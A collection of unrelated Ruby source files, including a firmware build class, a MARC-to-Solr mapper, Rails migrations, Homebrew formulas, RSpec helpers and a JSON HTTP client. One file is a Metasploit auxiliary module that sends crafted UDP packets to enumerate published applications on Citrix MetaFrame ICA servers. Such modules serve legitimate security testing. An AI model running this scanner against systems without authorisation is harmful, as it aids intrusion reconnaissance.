@firmware.hardware_for(@device).flat_map(&:libraries).uniq(&:name) end def codegen @codegen ||= Codegen.new linker, merge end def merge @merge ||= Merge.new compile end def compile @compile ||= @firmware.imports.flat_map do |software| compile_software software end end def compile_software(software) software.depends.flat_map do |depends| if depends.is_a? Comet::DSL::Software compile_software depends else compile_hardware depends end end + software.sources.reject(&:native?).flat_map do |source| source.files.map do |file| Compile.new source, file, linker end end end def compile_hardware(hardware) return [] unless hardware.targets == @device hardware.sources.reject(&:native?).flat_map do |source| source.files.map do |file| Compile.new source, file, linker end end end end end end
23.806723
85
0.56089
4a6aebae0f3b1b0a94cf24239cd71ae02bf7634d
3,250
require 'rubygems' require 'marc' # ruby gem for working with MARC data in Ruby require 'block_mapper' # the generic mapper class require 'marc_record_ext.rb' # our custom methods require 'base64' # so we can base64 encode the marc21 record class MARCMapper < BlockMapper def initialize() super before_each_source_item do |rec,index| # add custom methods to each marc record rec.extend MARCRecordExt end # remove ; / . , : and spaces from the end cleanup_regexp = /( |;|\/|\.|,|:)+$/ after_each_mapped_value do |field,v| #puts "cleaning up #{field} value(s) before adding to solr..." if v.is_a?(String) v.gsub(cleanup_regexp, '') # clean this string and return elsif v.is_a?(Array) v.map{|vv|vv.gsub(cleanup_regexp, '')} # clean each value and return a new array else v # just return whatever it is end end end # pass in a path to a marc file # a block can be used for logging etc.. # # mapper.from_marc_file('/path/to/data.mrc') do |mapped_doc| # # do something here... logging etc.. # end # # this returns an array of documents (hashes) # def from_marc_file(marc_file, shared_field_data={}, &blk) shared_field_data.each_pair do |k,v| # map each item in the hash to a solr field map k.to_sym, v end map :id do |rec,index| rec['001'].value.gsub(" ","").gsub("/","") end map :title_t do |rec,index| rec.values_for '245', 'a' end map :title_sort do |rec,index| rec.extract '245:a' end map :sub_title_t do |rec,index| rec.values_for '245', 'b' end map :alt_titles_t do |rec,index| rec.extract '240:b 700:t 710:t 711:t 440:a 490:a 505:a 830:a' end map :title_added_entry_t do |rec,index| rec.values_for '700', 't' end map :author_t do |rec,index| rec.extract '100:a 110:a 111:a 130:a 700:a 710:a 711:a' end map :published_t do |rec,index| rec.extract '260:a' end map :isbn_t do |rec,index| rec.isbn # in MARCRecordExt module end map :material_type_t do |rec,index| rec.values_for '300', 'a' end map :subject_t do |rec,index| rec.extract '600:a 610:a 611:a 630:a 650:a 651:a 655:a 690:a' end map :subject_era_facet do |rec,index| rec.extract '650:d 650:y 651:y 655:y' end map :geographic_subject_facet do |rec,index| rec.extract '650:c 650:z 651:a 651:x 651:z 655:z' end map :language_facet do |rec,index| rec.languages # in MARCRecordExt module end # _display is stored, but not indexed # don't store a string, store marc21 so we can read it back out # into a MARC::Record object map :marc_display do |rec,index| rec.to_xml end map :format_facet do |rec,index| rec.format # in MARCRecordExt module end # downcased, format, spaces converted to _ # This can be used for the partial view mapping map :format_code_t do |rec,index| rec.format.to_s.downcase.gsub(/ _/, ' ').gsub(/ /, '_') end reader = MARC::Reader.new(marc_file) self.run(reader, &blk) end end
26.422764
88
0.615077
26a965e622ad453d4f585ac1389795616eb077f3
2,290
## # $Id$ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Udp def initialize(info = {}) super(update_info(info, 'Name' => 'Citrix MetaFrame ICA Published Applications Scanner', 'Description' => %q{ This module attempts to query Citrix Metaframe ICA server to obtain a published list of applications. }, 'Author' => [ 'patrick' ], 'Version' => '$Revision$', 'References' => [ [ 'URL', 'http://www.securiteam.com/exploits/5CP0B1F80S.html' ], ] )) register_options( [ Opt::RPORT(1604), ], self.class) end def autofilter false end def run connect_udp print_status("Attempting to contact Citrix ICA service...") client_connect = "\x20\x00\x01\x30\x02\xfd\xa8\xe3\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" # Server hello response server_response = "\x30\x00\x02\x31\x02\xfd\xa8\xe3\x02\x00\x06\x44" udp_sock.put(client_connect) res = udp_sock.get(3) if (res[0,server_response.length] == server_response) print_status("Citrix MetaFrame ICA server detected. Requesting Published Applications list...") find_published = "\x2a\x00\x01\x32\x02\xfd\xa8\xe3\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x21\x00\x02\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" server_list_pre = "\xea\x00\x04\x33\x02\xfd\xa8\xe3\x02\x00\x06\x44\xac\x1f\x03\x1f" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00" + "\x0b\x00\x28\x00\x00\x00\x00\x00" udp_sock.put(find_published) res = udp_sock.get(3) if (res.index(server_list_pre) == 0) # good packet, with following data print_status("Citrix Applications Reported:\r\n" + res[server_list_pre.length,res.length].gsub("\x00","\r\n")) end else print_error("Citrix did not report any Published Applications. Try the brute force module instead.") end disconnect_udp end end
26.321839
114
0.675546
4ac08556448c255e7c3ab51881a3aa2897fed6f2
955
# Generated by the protocol buffer compiler. DO NOT EDIT! # source: google/ads/googleads/v3/services/ad_schedule_view_service.proto require 'google/protobuf' require 'google/ads/google_ads/v3/resources/ad_schedule_view_pb' require 'google/api/annotations_pb' require 'google/api/client_pb' require 'google/api/field_behavior_pb' require 'google/api/resource_pb' Google::Protobuf::DescriptorPool.generated_pool.build do add_file("google/ads/googleads/v3/services/ad_schedule_view_service.proto", :syntax => :proto3) do add_message "google.ads.googleads.v3.services.GetAdScheduleViewRequest" do optional :resource_name, :string, 1 end end end module Google module Ads module GoogleAds module V3 module Services GetAdScheduleViewRequest = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.ads.googleads.v3.services.GetAdScheduleViewRequest").msgclass end end end end end
31.833333
163
0.769634
b9500033ed6d3f0a521ee642ce9bab2da6ea1d0f
194
class RemoveUserLogin < ActiveRecord::Migration def change remove_column :repositories, :user_login, :string change_column :repositories, :user_id, :integer, null: false end end
27.714286
64
0.747423
bb7e8c3cf8261e3b32042b8cd7a8193e9605d064
171
class AddNameToApnApps < ActiveRecord::Migration def self.up add_column :apn_apps, :name, :string end def self.down remove_column :apn_apps, :name end end
19
48
0.725146
f85d8254dc62b48dd5b055fdebff6b1e5b142b06
365
cask 'processing2' do version '2.2.1' sha256 '8c237b3eb50626e8ffc648bfdeddaa18ceffbd6a48f8fec77a8eab5b774971fc' url "http://download.processing.org/processing-#{version}-macosx.zip" name 'Processing' homepage 'https://processing.org/' conflicts_with cask: 'processing' app 'Processing.app' zap delete: '~/Library/Processing/preferences.txt' end
24.333333
75
0.761644
9131437d03f782288e3f34c4f0364f2bc54688bb
642
require 'forwardable' require 'ku/ldap' module KU module Media class Group < Sequel::Model unrestrict_primary_key extend Forwardable DIRECTORY = KU::LDAP def_delegators :entry, :description, :members, :member? many_to_many :collections, key: :author_id def self.admin_group self[ENV['LDAP_ADMIN_GROUP'] || 'fak-itm-editor'] end def validate super errors.add(:entry, 'must exist in directory') unless id && entry end private def entry DIRECTORY.group id end end end end
18.882353
72
0.573209
bbaeb18746793433777a2442a2bc3bfaa3839cb5
243
class AddCurrencyToAccountVersions < ActiveRecord::Migration def up add_column :account_versions, :currency, :integer remove_column :account_versions, :detail end def down raise ActiveRecord::IrreversibleMigration end end
22.090909
60
0.777778
616e15e1cc8054cd6edf882c9121eb3f490912e1
1,006
# This file is auto-generated from the current state of the database. Instead # of editing this file, please use the migrations feature of Active Record to # incrementally modify your database, and then regenerate this schema definition. # # This file is the source Rails uses to define your schema when running `bin/rails # db:schema:load`. When creating a new database, `bin/rails db:schema:load` tends to # be faster and is potentially less error prone than running all of your # migrations from scratch. Old migrations may fail to apply correctly if those # migrations use external dependencies or application code. # # It's strongly recommended that you check this file into your version control system. ActiveRecord::Schema.define(version: 2021_04_02_205102) do create_table "cosmetics", force: :cascade do |t| t.string "name" t.string "brand" t.integer "user_id" end create_table "users", force: :cascade do |t| t.string "username" t.string "password_digest" end end
37.259259
86
0.759443
082116d1d77970c8e57ab0a51001118a38e00a91
335
class RegularEventUpdateJob < ApplicationJob queue_as :default def perform(*args) RegularEvents::Daily1UpdateJob.perform_now RegularEvents::Daily2UpdateJob.perform_now RegularEvents::Weekly1UpdateJob.perform_now RegularEvents::Weekly2UpdateJob.perform_now RegularEvents::MonthlyUpdateJob.perform_now end end
27.916667
47
0.814925
1d2f5259d3c161fa36df3a0d818d83f39860260a
1,055
require "language/node" class FirebaseCli < Formula desc "Firebase command-line tools" homepage "https://firebase.google.com/docs/cli/" url "https://registry.npmjs.org/firebase-tools/-/firebase-tools-7.8.1.tgz" sha256 "76cf2d485de8a83294daa8e24568df9b3749a71c81429544ce55dc14aae5dfc2" head "https://github.com/firebase/firebase-tools.git" bottle do cellar :any_skip_relocation sha256 "e22cfca782e05c9009756f05fbd79620e2b6a74a06bb462caa6d225ae98d02d4" => :catalina sha256 "5226ee842c7336c8e89fa44b7825d53c16912bd514b10c14000fafe5956f121b" => :mojave sha256 "b46f8569cd88a50b4552fe998f7d89a413f0c549126736d02c535103cd8b61c5" => :high_sierra end depends_on "node" def install system "npm", "install", *Language::Node.std_npm_install_args(libexec) bin.install_symlink Dir["#{libexec}/bin/*"] end test do (testpath/"test.exp").write <<~EOS spawn #{bin}/firebase login:ci --no-localhost expect "Paste" EOS assert_match "authorization code", shell_output("expect -f test.exp") end end
32.96875
93
0.75545
385e1c4bb14a468f387d0c7fbf5a4d5893a5511a
1,593
# frozen_string_literal: true require 'json' module HttpJson class Responder def initialize(requester, exception_class) @requester = requester @exception_class = exception_class end # - - - - - - - - - - - - - - - - - - - - - def get(path, args) response = requester.get(path, args) unpacked(response.body, path.to_s, args) rescue Exception => e fail exception_class.new(e.message) end # - - - - - - - - - - - - - - - - - - - - - def post(path, args) response = requester.post(path, args) unpacked(response.body, path.to_s, args) rescue Exception => e fail exception_class.new(e.message) end private attr_reader :requester, :exception_class def unpacked(body, path, args) json = JSON.parse!(body) unless json.is_a?(Hash) fail service_error(path, args, body, 'body is not JSON Hash') end if json.has_key?('exception') fail service_error(path, args, body, json['exception']) end unless json.has_key?(path) fail service_error(path, args, body, 'body is missing :path key') end json[path] rescue JSON::ParserError fail service_error(path, args, body, 'body is not JSON') end def service_error(path, args, body, message) $stdout.puts(JSON.pretty_generate({ "Exception: HttpJson::Responder": { path:path, args:args, body:body, message:message } })) $stdout.flush exception_class.new(message) end end end
23.776119
73
0.587571
aba2cf7cdea95a1d33a51fa2aa227b3e9f2604ad
272
class AddIndexToEveryIdField < ActiveRecord::Migration def change add_index :locations, :topic_id add_index :references, :reference_type_id add_index :references, :reference_source_id add_index :references, :topic_id add_index :topics, :user_id end end
27.2
54
0.779412
6224794e3b227e7e0d440902f38dc053b6c88deb
128
require 'test_helper' class UserPoliticianTest < ActiveSupport::TestCase # test "the truth" do # assert true # end end
16
50
0.71875
082e30bbf36c1d02888e158951aaf2e8b24cb81b
836
module Cryptoexchange::Exchanges module Koinex module Services class Pairs < Cryptoexchange::Services::Pairs PAIRS_URL = "#{Cryptoexchange::Exchanges::Koinex::Market::API_URL}/ticker" def fetch output = super adapt(output["prices"]) end def adapt(output) market_pairs = [] output.each do |target_raw| target = GetSymbol.get_symbol(target_raw[0]) target_raw[1].each do |base| market_pairs << Cryptoexchange::Models::MarketPair.new( base: base[0], target: target, market: Koinex::Market::NAME ) end end market_pairs end end end end end
27.866667
82
0.495215
6a3c3a1a7815611cb884cefc48e42b6889177dc0
364
# Copyright (c) Facebook, Inc. and its affiliates. name 'cpe_powermanagement' maintainer 'Facebook' maintainer_email '[email protected]' license 'BSD' description 'Manages powermanagement settings / profile' long_description IO.read(File.join(File.dirname(__FILE__), 'README.md')) version '0.1.0' supports 'mac_os_x' depends 'cpe_profiles' depends 'cpe_utils'
28
72
0.791209
7acc0cea58106b78e02011163bca2de088f8e41f
4,622
# frozen_string_literal: true require 'spec_helper' module Alchemy describe Api::ElementsController do routes { Alchemy::Engine.routes } describe '#index' do let(:page) { create(:alchemy_page, :public) } before do 2.times { create(:alchemy_element, page: page) } create(:alchemy_element, :nested, page: page) end it "returns all public not nested elements as json objects" do get :index, params: {format: :json} expect(response.status).to eq(200) expect(response.content_type).to eq('application/json') result = JSON.parse(response.body) expect(result).to have_key('elements') expect(result['elements'].last['nested_elements']).to_not be_empty expect(result['elements'].size).to eq(Alchemy::Element.not_nested.count) end context 'with page_id param' do let!(:other_page) { create(:alchemy_page, :public) } let!(:other_element) { create(:alchemy_element, page: other_page) } it "returns only elements from this page" do get :index, params: {page_id: other_page.id, format: :json} expect(response.status).to eq(200) expect(response.content_type).to eq('application/json') result = JSON.parse(response.body) expect(result).to have_key('elements') expect(result['elements'].size).to eq(1) expect(result['elements'][0]['page_id']).to eq(other_page.id) end end context 'with empty page_id param' do it "returns all not nested elements" do get :index, params: {page_id: '', format: :json} expect(response.status).to eq(200) expect(response.content_type).to eq('application/json') result = JSON.parse(response.body) expect(result).to have_key('elements') expect(result['elements'].size).to eq(Alchemy::Element.not_nested.count) end end context 'with named param' do let!(:other_element) { create(:alchemy_element, page: page, name: 'news') } it "returns only elements named like this." do get :index, params: {named: 'news', format: :json} expect(response.status).to eq(200) expect(response.content_type).to eq('application/json') result = JSON.parse(response.body) expect(result).to have_key('elements') expect(result['elements'].size).to eq(1) expect(result['elements'][0]['name']).to eq('news') end end context 'with empty named param' do it "returns all not nested elements" do get :index, params: {named: '', format: :json} expect(response.status).to eq(200) expect(response.content_type).to eq('application/json') result = JSON.parse(response.body) expect(result).to have_key('elements') expect(result['elements'].size).to eq(Alchemy::Element.not_nested.count) end end context 'as author' do before do authorize_user(build(:alchemy_dummy_user, :as_author)) end it "returns all not nested elements" do get :index, params: {format: :json} expect(response.status).to eq(200) expect(response.content_type).to eq('application/json') result = JSON.parse(response.body) expect(result).to have_key('elements') expect(result['elements'].size).to eq(Alchemy::Element.not_nested.count) end end end describe '#show' do let(:page) { build_stubbed(:alchemy_page) } let(:element) { build_stubbed(:alchemy_element, page: page, position: 1) } before do expect(Element).to receive(:find).and_return(element) end it "returns element as json" do get :show, params: {id: element.id, format: :json} expect(response.status).to eq(200) expect(response.content_type).to eq('application/json') result = JSON.parse(response.body) expect(result['id']).to eq(element.id) end context 'requesting an restricted element' do let(:page) { build_stubbed(:alchemy_page, restricted: true) } it "responds with 403" do get :show, params: {id: element.id, format: :json} expect(response.status).to eq(403) expect(response.content_type).to eq('application/json') result = JSON.parse(response.body) expect(result).to have_key('error') expect(result['error']).to eq("Not authorized") end end end end end
31.22973
83
0.61402
bb3c8626d32d5329132d87f59eb3eea26d7d23d8
1,692
# frozen_string_literal: true require 'spec_helper' RSpec.describe Gitlab::Metrics::Dashboard::Stages::MetricEndpointInserter do include MetricsDashboardHelpers let(:project) { build_stubbed(:project) } let(:environment) { build_stubbed(:environment, project: project) } describe '#transform!' do subject(:transform!) { described_class.new(project, dashboard, environment: environment).transform! } let(:dashboard) { load_sample_dashboard.deep_symbolize_keys } it 'generates prometheus_endpoint_path without newlines' do query = 'avg( sum( container_memory_usage_bytes{ container_name!="POD", '\ 'pod_name=~"^{{ci_environment_slug}}-(.*)", namespace="{{kube_namespace}}" } ) '\ 'by (job) ) without (job) /1024/1024/1024' transform! expect(all_metrics[2][:prometheus_endpoint_path]).to eq(prometheus_path(query)) end it 'includes a path for the prometheus endpoint with each metric' do transform! expect(all_metrics).to satisfy_all do |metric| metric[:prometheus_endpoint_path].present? && !metric[:prometheus_endpoint_path].include?("\n") end end it 'works when query/query_range is a number' do query = 2000 transform! expect(all_metrics[1][:prometheus_endpoint_path]).to eq(prometheus_path(query)) end end private def all_metrics dashboard[:panel_groups].flat_map do |group| group[:panels].flat_map { |panel| panel[:metrics] } end end def prometheus_path(query) Gitlab::Routing.url_helpers.prometheus_api_project_environment_path( project, environment, proxy_path: :query_range, query: query ) end end
28.2
105
0.700946
1d63f6a520f93eb652d6c9e5acff5f0dd9872296
834
cask 'refined-github-safari' do version '2.1.1' sha256 '4a912c723abd3d49577437e6ec7d1444ec6bdb8082673b95334ff3f28d08b6ec' url "https://github.com/lautis/refined-github-safari/releases/download/v#{version}/Refined-GitHub-for-Safari.zip" appcast 'https://github.com/lautis/refined-github-safari/releases.atom' name 'Refined GitHub for Safari' homepage 'https://github.com/lautis/refined-github-safari' depends_on macos: '>= :mojave' app 'Refined GitHub for Safari.app' zap delete: [ '~/Library/Application Scripts/fi.lautanala.refined-github', '~/Library/Application Scripts/fi.lautanala.refined-github-extension', '~/Library/Containers/fi.lautanala.refined-github', '~/Library/Containers/fi.lautanala.refined-github-extenstion', ] end
39.714286
115
0.703837
1dd32e6402d514b6d31066bddc9dda9b78969681
1,420
class Physfs < Formula desc "Library to provide abstract access to various archives" homepage "https://icculus.org/physfs/" url "https://icculus.org/physfs/downloads/physfs-3.0.2.tar.bz2" sha256 "304df76206d633df5360e738b138c94e82ccf086e50ba84f456d3f8432f9f863" head "https://hg.icculus.org/icculus/physfs/", using: :hg livecheck do url "https://icculus.org/physfs/downloads/" regex(/href=.*?physfs[._-]v?(\d+(?:\.\d+)+)\.t/i) end bottle do cellar :any sha256 "31693a34c610ea382a1b0832065db2b223db549ced6fe6a2f8c569d6b58bf19a" => :catalina sha256 "cb97a3a17728f3173d4c19fde495cffbddce965bbf6015e45882e3c27f267cf3" => :mojave sha256 "296927566472c976a578f89c4bd6bf0f518427a53d586499a8e202896d469ee3" => :high_sierra sha256 "6742501c33943dcdab748b3c2188cf6292f462b82896da001cdbcfbbcc01e489" => :sierra end depends_on "cmake" => :build def install mkdir "macbuild" do args = std_cmake_args args << "-DPHYSFS_BUILD_TEST=TRUE" args << "-DPHYSFS_BUILD_WX_TEST=FALSE" unless build.head? system "cmake", "..", *args system "make", "install" end end test do (testpath/"test.txt").write "homebrew" system "zip", "test.zip", "test.txt" (testpath/"test").write <<~EOS addarchive test.zip 1 cat test.txt EOS assert_match /Successful\.\nhomebrew/, shell_output("#{bin}/test_physfs < test 2>&1") end end
33.023256
93
0.707746
f7774ea137d0064202fa6867dc3042aa4f329467
908
require File.join( File.dirname(File.expand_path(__FILE__)), '../base') describe RestClient::Request do describe "ssl verification" do it "is successful with the correct ca_file" do request = RestClient::Request.new( :method => :get, :url => 'https://www.mozilla.com', :verify_ssl => OpenSSL::SSL::VERIFY_PEER, :ssl_ca_file => File.join(File.dirname(__FILE__), "certs", "equifax.crt") ) expect { request.execute }.to_not raise_error end it "is unsuccessful with an incorrect ca_file" do request = RestClient::Request.new( :method => :get, :url => 'https://www.mozilla.com', :verify_ssl => OpenSSL::SSL::VERIFY_PEER, :ssl_ca_file => File.join(File.dirname(__FILE__), "certs", "verisign.crt") ) expect { request.execute }.to raise_error(RestClient::SSLCertificateNotVerified) end end end
34.923077
86
0.640969
5d6eed5198346ca3e9e76a7fc9c618439de98bd7
3,962
# frozen_string_literal: true # Cloud Foundry Java Buildpack # Copyright 2013-2018 the original author or authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. require 'spec_helper' require 'component_helper' require 'fileutils' require 'java_buildpack/component/mutable_java_home' require 'java_buildpack/jre/open_jdk_like' require 'java_buildpack/jre/open_jdk_like_jre' require 'java_buildpack/jre/open_jdk_like_memory_calculator' require 'java_buildpack/jre/open_jdk_like_security_providers' describe JavaBuildpack::Jre::OpenJDKLike do include_context 'with component help' let(:component) { StubOpenJDKLike.new context } let(:java_home) { JavaBuildpack::Component::MutableJavaHome.new } let(:version_7) { VERSION_7 = JavaBuildpack::Util::TokenizedVersion.new('1.7.0_+') } let(:version_8) { VERSION_8 = JavaBuildpack::Util::TokenizedVersion.new('1.8.0_+') } let(:configuration) do { 'jre' => jre_configuration, 'memory_calculator' => memory_calculator_configuration, 'jvmkill_agent' => jvmkill_agent_configuration } end let(:jre_configuration) { instance_double('jre_configuration') } let(:jvmkill_agent_configuration) { {} } let(:memory_calculator_configuration) { { 'stack_threads' => '200' } } it 'always supports' do expect(component.supports?).to be end it 'creates submodules' do allow_any_instance_of(StubOpenJDKLike).to receive(:supports?).and_return false allow(JavaBuildpack::Jre::JvmkillAgent) .to receive(:new).with(sub_configuration_context(jvmkill_agent_configuration)) allow(JavaBuildpack::Jre::OpenJDKLikeJre) .to receive(:new).with(sub_configuration_context(jre_configuration).merge(component_name: 'Stub Open JDK Like')) allow(JavaBuildpack::Jre::OpenJDKLikeMemoryCalculator) .to receive(:new).with(sub_configuration_context(memory_calculator_configuration)) allow(JavaBuildpack::Jre::OpenJDKLikeSecurityProviders) .to receive(:new).with(context) component.sub_components context end it 'returns command for Java 7' do java_home.version = version_7 expect(component.command).to eq('CALCULATED_MEMORY=$($PWD/.java-buildpack/open_jdk_like/bin/' \ 'java-buildpack-memory-calculator-0.0.0 -totMemory=$MEMORY_LIMIT' \ ' -loadedClasses=0 -poolType=permgen -stackThreads=200 -vmOptions="$JAVA_OPTS")' \ ' && echo JVM Memory Configuration: $CALCULATED_MEMORY && ' \ 'JAVA_OPTS="$JAVA_OPTS $CALCULATED_MEMORY"') end it 'returns command for Java 8' do java_home.version = version_8 expect(component.command).to eq('CALCULATED_MEMORY=$($PWD/.java-buildpack/open_jdk_like/bin/' \ 'java-buildpack-memory-calculator-0.0.0 -totMemory=$MEMORY_LIMIT' \ ' -loadedClasses=0 -poolType=metaspace -stackThreads=200 -vmOptions="$JAVA_OPTS")' \ ' && echo JVM Memory Configuration: $CALCULATED_MEMORY && ' \ 'JAVA_OPTS="$JAVA_OPTS $CALCULATED_MEMORY"') end end class StubOpenJDKLike < JavaBuildpack::Jre::OpenJDKLike public :command, :sub_components def supports? super end end def sub_configuration_context(configuration) c = context.clone c[:configuration] = configuration c end
37.377358
120
0.697375
8771d29843e3f087fabf4547acf41f1adeb79ebd
551
module Pageflow class Account < ActiveRecord::Base include FeatureTarget has_many :users has_many :entries has_many :folders has_many :themings belongs_to :default_theming, :class_name => 'Theming' validates :default_theming, :presence => true accepts_nested_attributes_for :default_theming, :update_only => true scope :with_landing_page, -> { where.not(:landing_page_name => '') } def build_default_theming(*args) super.tap do |theming| theming.account = self end end end end
22.04
72
0.689655
b94460edd165215420690e451183e2f8726552bb
2,693
class Libmemcached < Formula desc "C and C++ client library to the memcached server" homepage "https://libmemcached.org/" url "https://launchpad.net/libmemcached/1.0/1.0.18/+download/libmemcached-1.0.18.tar.gz" sha256 "e22c0bb032fde08f53de9ffbc5a128233041d9f33b5de022c0978a2149885f82" revision 2 bottle do cellar :any sha256 "0c7902542fe3b047ce0a512296b1ec3e0da3d731fef0cbd5143152ce17d8f778" => :mojave sha256 "351ec4bceab1983a0523739f241c7b3dfb5c9c4c98fe04ae89533de71e0d462b" => :high_sierra sha256 "f0fc1410caf2e9bfa130c52758a3d3a98a34032fe3d37a20980ab219042b6487" => :sierra sha256 "7b2540dda66e3de1be0603aafa10a18a006768f698a7db289c380235dad109a3" => :el_capitan sha256 "4e7e0cfb8f4d8f31e36c23b545ad3b0153c2f6d99645abf603f7e9f1ed427296" => :yosemite end depends_on "memcached" # https://bugs.launchpad.net/libmemcached/+bug/1245562 patch do url "https://raw.githubusercontent.com/Homebrew/formula-patches/60f3532/libmemcached/1.0.18.patch" sha256 "592f10fac729bd2a2b79df26086185d6e08f8667cb40153407c08d4478db89fb" end def install system "./configure", "--prefix=#{prefix}" system "make", "install" end test do (testpath/"test.c").write <<~EOS #include <assert.h> #include <string.h> #include <libmemcached-1.0/memcached.h> int main(int argc, char **argv) { const char *conf = "--SERVER=localhost:11211"; memcached_st *memc = memcached(conf, strlen(conf)); assert(memc != NULL); // Add a value. const char *key = "key"; const char *val = "val"; assert(memcached_add(memc, key, strlen(key), val, strlen(val), (time_t)0, (uint32_t)0) == MEMCACHED_SUCCESS); // Fetch and check the added value. size_t return_val_len; uint32_t return_flags; memcached_return_t error; char *return_val = memcached_get(memc, key, strlen(key), &return_val_len, &return_flags, &error); assert(return_val != NULL); assert(error == MEMCACHED_SUCCESS); assert(return_val_len == strlen(val)); assert(strncmp(return_val, val, return_val_len) == 0); assert(return_flags == 0); free(return_val); memcached_free(memc); } EOS system ENV.cc, "-I#{include}", "-L#{lib}", "-lmemcached", "test.c", "-o", "test" memcached = Formula["memcached"].bin/"memcached" # Assumes port 11211 is not already taken io = IO.popen("#{memcached} --listen=localhost:11211") sleep 1 system "./test" Process.kill "TERM", io.pid end end
36.391892
102
0.658002
bb97e1276554217993b5e0b2c8dedee7c07f09cf
117
class DropTurnsFromGames < ActiveRecord::Migration[5.1] def change remove_column :games, :turn_count end end
19.5
55
0.760684
6abfd8f6d717e4e2cb08323d25c2c911aa2d9063
4,901
=begin #Selling Partner API for Direct Fulfillment Inventory Updates #The Selling Partner API for Direct Fulfillment Inventory Updates provides programmatic access to a direct fulfillment vendor's inventory updates. OpenAPI spec version: v1 Generated by: https://github.com/swagger-api/swagger-codegen.git Swagger Codegen version: 3.0.33 =end # load the gem require 'vendor-direct-fulfillment-inventory-api-model' # The following was generated by the `rspec --init` command. Conventionally, all # specs live under a `spec` directory, which RSpec adds to the `$LOAD_PATH`. # The generated `.rspec` file contains `--require spec_helper` which will cause # this file to always be loaded, without a need to explicitly require it in any # files. # # Given that it is always loaded, you are encouraged to keep this file as # light-weight as possible. Requiring heavyweight dependencies from this file # will add to the boot time of your test suite on EVERY test run, even for an # individual file that may not need all of that loaded. Instead, consider making # a separate helper file that requires the additional dependencies and performs # the additional setup, and require it from the spec files that actually need # it. # # The `.rspec` file also contains a few flags that are not defaults but that # users commonly want. # # See http://rubydoc.info/gems/rspec-core/RSpec/Core/Configuration RSpec.configure do |config| # rspec-expectations config goes here. You can use an alternate # assertion/expectation library such as wrong or the stdlib/minitest # assertions if you prefer. config.expect_with :rspec do |expectations| # This option will default to `true` in RSpec 4. It makes the `description` # and `failure_message` of custom matchers include text for helper methods # defined using `chain`, e.g.: # be_bigger_than(2).and_smaller_than(4).description # # => "be bigger than 2 and smaller than 4" # ...rather than: # # => "be bigger than 2" expectations.include_chain_clauses_in_custom_matcher_descriptions = true end # rspec-mocks config goes here. You can use an alternate test double # library (such as bogus or mocha) by changing the `mock_with` option here. config.mock_with :rspec do |mocks| # Prevents you from mocking or stubbing a method that does not exist on # a real object. This is generally recommended, and will default to # `true` in RSpec 4. mocks.verify_partial_doubles = true end # The settings below are suggested to provide a good initial experience # with RSpec, but feel free to customize to your heart's content. =begin # These two settings work together to allow you to limit a spec run # to individual examples or groups you care about by tagging them with # `:focus` metadata. When nothing is tagged with `:focus`, all examples # get run. config.filter_run :focus config.run_all_when_everything_filtered = true # Allows RSpec to persist some state between runs in order to support # the `--only-failures` and `--next-failure` CLI options. We recommend # you configure your source control system to ignore this file. config.example_status_persistence_file_path = "spec/examples.txt" # Limits the available syntax to the non-monkey patched syntax that is # recommended. For more details, see: # - http://rspec.info/blog/2012/06/rspecs-new-expectation-syntax/ # - http://www.teaisaweso.me/blog/2013/05/27/rspecs-new-message-expectation-syntax/ # - http://rspec.info/blog/2014/05/notable-changes-in-rspec-3/#zero-monkey-patching-mode config.disable_monkey_patching! # This setting enables warnings. It's recommended, but in some cases may # be too noisy due to issues in dependencies. config.warnings = true # Many RSpec users commonly either run the entire suite or an individual # file, and it's useful to allow more verbose output when running an # individual spec file. if config.files_to_run.one? # Use the documentation formatter for detailed output, # unless a formatter has already been configured # (e.g. via a command-line flag). config.default_formatter = 'doc' end # Print the 10 slowest examples and example groups at the # end of the spec run, to help surface which specs are running # particularly slow. config.profile_examples = 10 # Run specs in random order to surface order dependencies. If you find an # order dependency and want to debug it, you can fix the order by providing # the seed, which is printed after each run. # --seed 1234 config.order = :random # Seed global randomization in this process using the `--seed` CLI option. # Setting this allows you to use `--seed` to deterministically reproduce # test failures related to randomization by passing the same `--seed` value # as the one that triggered the failure. Kernel.srand config.seed =end end
44.153153
146
0.747194
1c30180a3c1b6e697010f0ec7b600db1944ee85f
1,147
# Copyright 2014 Square Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # Worker that recalculates readiness for a Key's ancestors, namely: # - {Commit Commits} # - {Article Article}. class KeyAncestorsRecalculator include Sidekiq::Worker sidekiq_options queue: :low # Executes this worker. # # @param [Fixnum] key_id The ID of a Key. def perform(key_id) key = Key.find(key_id) key.article.try!(:recalculate_ready!) CommitsKey.where(key_id: key_id).pluck(:commit_id).each do |commit_id| CommitRecalculator.perform_once commit_id.to_i end end include SidekiqLocking end
30.184211
77
0.721883
0826ce790248e221792093b89c055f3fd52020ca
4,839
